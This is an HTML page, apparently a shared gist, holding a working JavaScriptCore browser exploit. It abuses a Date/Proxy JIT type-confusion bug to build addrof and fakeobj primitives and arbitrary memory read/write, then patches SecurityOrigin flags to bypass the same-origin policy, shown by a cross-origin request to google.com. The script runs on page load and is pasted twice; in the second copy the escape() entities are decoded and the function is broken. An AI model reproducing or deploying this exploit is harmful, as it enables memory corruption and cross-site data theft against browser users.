jakeajames/qwertybug.html

## qwertybug.html
<pre id="logs"></pre>

<script>
// utilities

let arr = new Uint32Array(2);
let arr64 = new Float64Array(arr.buffer); // use same buffer

function floatToInt(float) {
	arr64[0] = float;
	return arr[0] + arr[1] * 2**32;
}

function intToFloat(int) {
	arr[0] = int;
	arr[1] = Math.floor(int/2**32);
	return arr64[0];
}

// address leak primitive
function addrof(obj) {
	let confuse = new Array(1);
	confuse[0] = 13.37; // we'll replace 13.37 with an object which will still be treated as a float

	let date = new Date(); // we'll use this to trigger the bug
	date[0] = 1; // set any number to any index, required but idk why, haven't looked at the bug

	let trigger = false;
	let orig = Object.getPrototypeOf(Date.prototype);

	let func = function() {
		if (trigger) {
			confuse[0] = obj; // replace
		}
	};

	Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: func}); // call func whenever we check if a property exists and it doesn't exist. this will trigger the bug

	let arr64 = new Float64Array(1);  // where to save result
	let leak = function(date, arr64, confuse) {
		confuse[0]; // idk why
		var result = 1 in date; // trigger our handler; index cannot be the one we set (0 in this case) because that won't trigger the handler
		arr64[0] = confuse[0];
		return result; // we need to return result otherwise after a few calls it will be optimized out and handler won't be called
	}

	for (let i = 0; i < 10000; i++) leak(date, arr64, confuse); // run a lot of times to JIT the function

	trigger = true;
	leak(date, arr64, confuse);
	Object.setPrototypeOf(Date.prototype, orig); // fixup Date
	return floatToInt(arr64[0]);
}

// same thing as addrof() except instead of leaking a pointer we replace a pointer
function fakeobj(addr) {
	addr = intToFloat(addr);

	let confuse = new Array(1);
	confuse[0] = 13.37;

	let date = new Date();
	date[0] = 1;

	let trigger = false;
	let orig = Object.getPrototypeOf(Date.prototype);

	let func = function() {
		if (trigger) {
			confuse[0] = {}; // replace the float with an empty object
		}
	};

	Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: func});

	let write = function(date, confuse) {
		confuse[0];
		var result = 1 in date;
		confuse[0] = addr; // replace our empty object with our target address
		return result;
	}

	for (let i = 0; i < 10000; i++) write(date, confuse); // run a lot of times to JIT the function

	trigger = true;
	write(date, confuse);
	Object.setPrototypeOf(Date.prototype, orig);
	return confuse[0];
}

print = function(what) {
	document.getElementById("logs").innerHTML += what + "\n";
}

escape = function(html) {
	return html.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;").replace(/'/g, "&#039;");
}

function pwn() {
	// stage 1
	print("[*] testing type confusion");

	test = fakeobj(addrof({a: 1337}));
	if (test.a != 1337) {
		print("[-] stage 1 failed");
		return;
	}
	print("[*] stage 1 successful");

	// stage 2
	print("[*] starting stage 2");

	// spray 0x5000 double arrays
	var arr = [];
	for (var i = 0; i < 0x5000; i++) {
		var obj = [1.1, 1.2];
		obj.a = 1337; // this will be used later
		obj["prop_" + i] = 2; // need a unique property to generate structure IDs
		arr.push(obj); // push
	}

	target = arr[0]; // pick one of the arrays, we'll corrupt this

	// now craft a fake array
	var fake = {};
	fake.JSCellHeader = intToFloat(0x0108200700003000 - 2**48); // double array with structure ID 0x03000
	fake.Butterfly = target; // set our target object as the butterfly

	// make it an object
	fakeaddr = addrof(fake) + 0x10; // shift by 16 so we skip header and butterfly of "fake" and get to our data
	print("[i] fake array at 0x" + fakeaddr.toString(16));
	fobj = fakeobj(fakeaddr);

	// from now on changing fobj will corrupt target

	var orig_bfo = fobj[1]; // save the butterfly of target

	var boxed = [{}]; // contigous array, can hold objects, doubles, ints etc.
	var unboxed = [13.37, 13.37, 13.37, 13.37]; // double array. can hold only doubles
	unboxed[0] = 12.37; // trigger CopyOnWrite

	var boxed_addr = addrof(boxed);
	var unboxed_addr = addrof(unboxed);

	fobj[1] = intToFloat(unboxed_addr);
	var unboxed_bf = floatToInt(target[1]); // get butterfly of boxed
	fobj[1] = intToFloat(boxed_addr);
	var boxed_bf = floatToInt(target[1]);
	target[1] = intToFloat(unboxed_bf); // set it to unboxed. now unboxed and boxed have the same butterfly

	fobj[1] = orig_bfo;

	addrof = function(obj) {
		boxed[0] = obj;
		return floatToInt(unboxed[0]);
	};

	fakeobj = function(addr) {
		unboxed[0] = intToFloat(addr);
		return boxed[0];
	};

	add = addrof({a: 4141})
	test = fakeobj(add);
	if (test.a != 4141) {
		print("[-] stage 2 failed");
		return;
	}
	print("[*] stage 2 addrof/fakeobj successful");

	// doubles in reality can hold up to 52 bits, but this is enough on most cases
	// for reading and writing we will modify 'a' property of 'target', using the butterfly can't be done as reading will only work when 8 bytes before the address contain a non-zero value (and similarly doing a write will corrupt those bytes if zero)
	read52 = function(where) {
		fobj[1] = intToFloat(where + 0x10); // property 'a' is at butterfly - 0x10
		ret = addrof(target.a); // although array is a double-only array that does not apply to properties, a pointer in there will be treated as an object
		fobj[1] = orig_bfo;
		return ret;
	}

	// this does not work when writing new flags, crashes immediately on fakeobj(). idk why?
	write52 = function(where, what) {
		fobj[1] = intToFloat(where + 0x10); // property 'a' is at butterfly - 0x10
		target.a = fakeobj(what);
		fobj[1] = orig_bfo;
	}

	// works better in our case, but value must be greater than or equal to 2**48, that is why I align the flags offset in such a way
	write_JSValue = function(where, what) {
		fobj[1] = intToFloat(where + 0x10);
	    target.a = intToFloat(what - 2**48);
	    fobj[1] = orig_bfo;
	}

	print("[*] Starting stage 3")
	var jsxhr = new XMLHttpRequest();
	var jsxhrAddr = addrof(jsxhr);
	print("[i] JSXMLHttpRequest: 0x" + jsxhrAddr.toString(16));
	var xhrAddr = read52(jsxhrAddr + 0x18);
	print("[i] XMLHttpRequest: 0x" + xhrAddr.toString(16));
    var scriptExecContextAddr = read52(xhrAddr + 0x68);
    print("[i] ScriptExecutionContext: 0x" + scriptExecContextAddr.toString(16));
    var securityOriginPolicyAddr = read52(scriptExecContextAddr + 8);
    print("[i] securityOriginPolicy: 0x" + securityOriginPolicyAddr.toString(16));
    securityOriginAddr = read52(securityOriginPolicyAddr + 8);
    print("[i] securityOrigin: 0x" + securityOriginPolicyAddr.toString(16));

    flags = read52(securityOriginAddr + 0x2e);
    print("[i] flags = 0x" + flags.toString(16));

    write_JSValue(securityOriginAddr + 0x2e, flags + 0x1000000);

    flags = read52(securityOriginAddr + 0x2e);
    print("[i] flags = 0x" + flags.toString(16));

    // I have no idea if this actually prevents future crashes
    print("[*] Cleaning up");
	fobj[1] = intToFloat(boxed_addr);
	target[1] = intToFloat(boxed_bf);
	fobj[1] = orig_bfo;
	delete fake.Butterfly;

	jsxhr.onreadystatechange = function() {
	    if (this.readyState == 4 && this.status == 200) {
	       print("[+] Success! www.google.com: " + escape(jsxhr.responseText));
	    }
	};
	jsxhr.open("GET", "https://www.google.com", true);
	jsxhr.send();
}

pwn();
</script>
	<pre id="logs"></pre>

	<script>
	// utilities

	let arr = new Uint32Array(2);
	let arr64 = new Float64Array(arr.buffer); // use same buffer

	function floatToInt(float) {
	arr64[0] = float;
	return arr[0] + arr[1] * 2**32;
	}

	function intToFloat(int) {
	arr[0] = int;
	arr[1] = Math.floor(int/2**32);
	return arr64[0];
	}

	// address leak primitive
	function addrof(obj) {
	let confuse = new Array(1);
	confuse[0] = 13.37; // we'll replace 13.37 with an object which will still be treated as a float

	let date = new Date(); // we'll use this to trigger the bug
	date[0] = 1; // set any number to any index, required but idk why, haven't looked at the bug

	let trigger = false;
	let orig = Object.getPrototypeOf(Date.prototype);

	let func = function() {
	if (trigger) {
	confuse[0] = obj; // replace
	}
	};

	Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: func}); // call func whenever we check if a property exists and it doesn't exist. this will trigger the bug

	let arr64 = new Float64Array(1); // where to save result
	let leak = function(date, arr64, confuse) {
	confuse[0]; // idk why
	var result = 1 in date; // trigger our handler; index cannot be the one we set (0 in this case) because that won't trigger the handler
	arr64[0] = confuse[0];
	return result; // we need to return result otherwise after a few calls it will be optimized out and handler won't be called
	}

	for (let i = 0; i < 10000; i++) leak(date, arr64, confuse); // run a lot of times to JIT the function

	trigger = true;
	leak(date, arr64, confuse);
	Object.setPrototypeOf(Date.prototype, orig); // fixup Date
	return floatToInt(arr64[0]);
	}

	// same thing as addrof() except instead of leaking a pointer we replace a pointer
	function fakeobj(addr) {
	addr = intToFloat(addr);

	let confuse = new Array(1);
	confuse[0] = 13.37;

	let date = new Date();
	date[0] = 1;

	let trigger = false;
	let orig = Object.getPrototypeOf(Date.prototype);

	let func = function() {
	if (trigger) {
	confuse[0] = {}; // replace the float with an empty object
	}
	};

	Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: func});

	let write = function(date, confuse) {
	confuse[0];
	var result = 1 in date;
	confuse[0] = addr; // replace our empty object with our target address
	return result;
	}

	for (let i = 0; i < 10000; i++) write(date, confuse); // run a lot of times to JIT the function

	trigger = true;
	write(date, confuse);
	Object.setPrototypeOf(Date.prototype, orig);
	return confuse[0];
	}

	print = function(what) {
	document.getElementById("logs").innerHTML += what + "\n";
	}

	escape = function(html) {
	return html.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">").replace(/"/g, """).replace(/'/g, "'");
	}

	function pwn() {
	// stage 1
	print("[*] testing type confusion");

	test = fakeobj(addrof({a: 1337}));
	if (test.a != 1337) {
	print("[-] stage 1 failed");
	return;
	}
	print("[*] stage 1 successful");

	// stage 2
	print("[*] starting stage 2");

	// spray 0x5000 double arrays
	var arr = [];
	for (var i = 0; i < 0x5000; i++) {
	var obj = [1.1, 1.2];
	obj.a = 1337; // this will be used later
	obj["prop_" + i] = 2; // need a unique property to generate structure IDs
	arr.push(obj); // push
	}

	target = arr[0]; // pick one of the arrays, we'll corrupt this

	// now craft a fake array
	var fake = {};
	fake.JSCellHeader = intToFloat(0x0108200700003000 - 2**48); // double array with structure ID 0x03000
	fake.Butterfly = target; // set our target object as the butterfly

	// make it an object
	fakeaddr = addrof(fake) + 0x10; // shift by 16 so we skip header and butterfly of "fake" and get to our data
	print("[i] fake array at 0x" + fakeaddr.toString(16));
	fobj = fakeobj(fakeaddr);

	// from now on changing fobj will corrupt target

	var orig_bfo = fobj[1]; // save the butterfly of target

	var boxed = [{}]; // contigous array, can hold objects, doubles, ints etc.
	var unboxed = [13.37, 13.37, 13.37, 13.37]; // double array. can hold only doubles
	unboxed[0] = 12.37; // trigger CopyOnWrite

	var boxed_addr = addrof(boxed);
	var unboxed_addr = addrof(unboxed);

	fobj[1] = intToFloat(unboxed_addr);
	var unboxed_bf = floatToInt(target[1]); // get butterfly of boxed
	fobj[1] = intToFloat(boxed_addr);
	var boxed_bf = floatToInt(target[1]);
	target[1] = intToFloat(unboxed_bf); // set it to unboxed. now unboxed and boxed have the same butterfly

	fobj[1] = orig_bfo;

	addrof = function(obj) {
	boxed[0] = obj;
	return floatToInt(unboxed[0]);
	};

	fakeobj = function(addr) {
	unboxed[0] = intToFloat(addr);
	return boxed[0];
	};

	add = addrof({a: 4141})
	test = fakeobj(add);
	if (test.a != 4141) {
	print("[-] stage 2 failed");
	return;
	}
	print("[*] stage 2 addrof/fakeobj successful");

	// doubles in reality can hold up to 52 bits, but this is enough on most cases
	// for reading and writing we will modify 'a' property of 'target', using the butterfly can't be done as reading will only work when 8 bytes before the address contain a non-zero value (and similarly doing a write will corrupt those bytes if zero)
	read52 = function(where) {
	fobj[1] = intToFloat(where + 0x10); // property 'a' is at butterfly - 0x10
	ret = addrof(target.a); // although array is a double-only array that does not apply to properties, a pointer in there will be treated as an object
	fobj[1] = orig_bfo;
	return ret;
	}

	// this does not work when writing new flags, crashes immediately on fakeobj(). idk why?
	write52 = function(where, what) {
	fobj[1] = intToFloat(where + 0x10); // property 'a' is at butterfly - 0x10
	target.a = fakeobj(what);
	fobj[1] = orig_bfo;
	}

	// works better in our case, but value must be greater than or equal to 2**48, that is why I align the flags offset in such a way
	write_JSValue = function(where, what) {
	fobj[1] = intToFloat(where + 0x10);
	target.a = intToFloat(what - 2**48);
	fobj[1] = orig_bfo;
	}

	print("[*] Starting stage 3")
	var jsxhr = new XMLHttpRequest();
	var jsxhrAddr = addrof(jsxhr);
	print("[i] JSXMLHttpRequest: 0x" + jsxhrAddr.toString(16));
	var xhrAddr = read52(jsxhrAddr + 0x18);
	print("[i] XMLHttpRequest: 0x" + xhrAddr.toString(16));
	var scriptExecContextAddr = read52(xhrAddr + 0x68);
	print("[i] ScriptExecutionContext: 0x" + scriptExecContextAddr.toString(16));
	var securityOriginPolicyAddr = read52(scriptExecContextAddr + 8);
	print("[i] securityOriginPolicy: 0x" + securityOriginPolicyAddr.toString(16));
	securityOriginAddr = read52(securityOriginPolicyAddr + 8);
	print("[i] securityOrigin: 0x" + securityOriginPolicyAddr.toString(16));

	flags = read52(securityOriginAddr + 0x2e);
	print("[i] flags = 0x" + flags.toString(16));

	write_JSValue(securityOriginAddr + 0x2e, flags + 0x1000000);

	flags = read52(securityOriginAddr + 0x2e);
	print("[i] flags = 0x" + flags.toString(16));

	// I have no idea if this actually prevents future crashes
	print("[*] Cleaning up");
	fobj[1] = intToFloat(boxed_addr);
	target[1] = intToFloat(boxed_bf);
	fobj[1] = orig_bfo;
	delete fake.Butterfly;

	jsxhr.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	print("[+] Success! www.google.com: " + escape(jsxhr.responseText));
	}
	};
	jsxhr.open("GET", "https://www.google.com", true);
	jsxhr.send();
	}

	pwn();
	</script>